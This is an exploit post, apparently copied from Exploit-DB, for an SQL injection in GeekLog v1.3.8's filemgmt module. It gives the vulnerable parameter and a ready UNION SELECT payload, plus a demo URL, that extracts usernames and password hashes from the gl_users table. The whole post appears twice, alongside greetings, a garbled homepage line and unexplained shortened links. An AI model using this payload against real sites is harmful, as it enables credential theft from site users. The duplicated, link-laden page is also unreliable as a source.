KAYNAK : http://www.exploit-db.com/exploits/15091/
GeekLog v1.3.8 (filemgmt) SQL Injection Vulnerability
###########################
Author : Gamoscu
Homepage : http://www.xxx.comhttp://www.1923turk.comhttp://www.1923turk.com
Blog : [url]https://tik.lat/EiYok
Script : https://tik.lat/rKo1y
Download: https://tik.lat/C1kMQ
###########################
[ Vulnerable File ]
filemgmt/singlefile.php?lid=1 [ SQL ]
[ XpL ]
-1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1--
[ Demo]
http://server/filemgmt/singlefile.php?lid=-1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1-- [url]https://tik.lat/H0aYC
#
# Manas58 – Delibey – Tiamo – Psiko – Turco – infazci – X-TRO
#
#
#
# #Elektrikist#
#
#
#
# FREEGAZA
#
#
# Edited
#
#############################################
GeekLog v1.3.8 (filemgmt) SQL Injection Vulnerability
###########################
Author : Gamoscu
Homepage : http://www.xxx.comhttp://www.1923turk.comhttp://www.1923turk.com
Blog : [url]https://tik.lat/EiYok
Script : https://tik.lat/rKo1y
Download: https://tik.lat/C1kMQ
###########################
[ Vulnerable File ]
filemgmt/singlefile.php?lid=1 [ SQL ]
[ XpL ]
-1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1--
[ Demo]
http://server/filemgmt/singlefile.php?lid=-1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1-- [url]https://tik.lat/H0aYC
#
# Manas58 – Delibey – Tiamo – Psiko – Turco – infazci – X-TRO
#
#
#
# #Elektrikist#
#
#
#
# FREEGAZA
#
#
# Edited
#
#############################################
